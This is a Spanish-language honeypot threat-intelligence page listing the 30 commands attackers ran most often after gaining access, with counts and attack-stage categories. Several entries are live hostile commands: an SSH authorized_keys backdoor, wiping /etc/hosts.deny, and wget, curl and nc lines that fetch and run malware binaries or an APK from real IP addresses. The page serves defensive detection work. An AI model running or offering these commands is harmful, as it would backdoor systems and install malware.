Comandos Ejecutados

Analisis en tiempo real de los comandos mas ejecutados por atacantes tras obtener acceso a sistemas. Datos recopilados de nuestra red global de honeypots en las ultimas 24 horas.

4,370 comandos en 24h

Top Comandos Ejecutados

$lockr -ia .ssh

175 IPs218x

$cd ~; chattr -ia .ssh; lockr -ia .ssh

175 IPs218x

cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

173 IPs216x

$Enter new UNIX password:

86 IPs200x

$uname -a

161 IPs199x

$cat /proc/cpuinfo | grep model | grep name | wc -l

153 IPs191x

$lscpu | grep Model

153 IPs191x

$df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

153 IPs191x

$w

152 IPs190x

10.

$uname

152 IPs190x

11.

$top

152 IPs190x

12.

$whoami

152 IPs190x

13.

$uname -m

153 IPs190x

14.

$which ls

151 IPs189x

15.

$free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

151 IPs189x

16.

$ls -lh $(which ls)

151 IPs189x

17.

$crontab -l

151 IPs188x

18.

$cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

150 IPs188x

19.

$cat /proc/cpuinfo | grep name | wc -l

151 IPs186x

20.

rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;

80 IPs88x

21.

cd /data/local/tmp;mkdir .p 2>/dev/null;cd .p;(wget -qO b http://196.251.107.133/bins/parm7 2>/dev/null||busybox wget -qO b http://196.251.107.133/bins/parm7 2>/dev/null||curl -so b http://196.251.107.133/bins/parm7 2>/dev/null||toybox wget -qO b http://196.251.107.133/bins/parm7 2>/dev/null);chmod 777 b 2>/dev/null;(su 0 ./b adb||./b adb) 2>/dev/null;rm -f b;(wget -qO b http://196.251.107.133/bins/parm5 2>/dev/null||busybox wget -qO b http://196.251.107.133/bins/parm5 2>/dev/null||curl -so b ht

1 IPs56x

22.

$/bin/./uname -s -v -n -r -m

12 IPs37x

23.

$echo hello

4 IPs19x

24.

cd /data/local/tmp/; busybox wget http://176.65.139.11/wget.sh; sh wget.sh; curl http://176.65.139.11/wget.sh -o wget.sh; sh wget.sh; wget http://176.65.139.11/wget.sh; sh wget.sh

1 IPs17x

25.

for dir in /data/local/tmp /tmp /sdcard /mnt/sdcard /storage/emulated/0 /data/cache /dev/shm; do cd $dir && (nc 94.156.152.67 8081 > flexoiu 2>/dev/null || nc -w 30 94.156.152.67 8081 > flexoiu 2>/dev/null) && chmod 777 flexoiu && ./flexoiu & done

1 IPs13x

26.

cd /data/local/tmp && nc 94.156.152.67 8081 > app.apk && pm install -r app.apk && am start -n com.snowrider.game/.SnowRiderActivity && rm app.apk

1 IPs9x

27.

$Accept-Encoding: gzip

3 IPs8x

28.

$cd /data/local/tmp && nc 94.156.152.67 8081 > flexoiu && chmod 777 flexoiu && ./flexoiu

1 IPs8x

29.

$PING

4 IPs8x

30.

$curl2

1 IPs7x

Reconocimiento

Comandos para obtener informacion del sistema (uname, whoami, cat /etc/passwd)

Descarga

Comandos para descargar malware (wget, curl, tftp)

Persistencia

Comandos para mantener acceso (crontab, chmod, chattr)

Movimiento Lateral

Comandos para expandirse en la red (ssh, scp, ping)

Acerca de estos datos

Estos comandos son capturados en tiempo real cuando atacantes obtienen acceso a nuestros honeypots. Representan las tecnicas reales utilizadas en ataques automatizados y manuales. Utiliza esta informacion para mejorar tu deteccion de amenazas y respuesta a incidentes.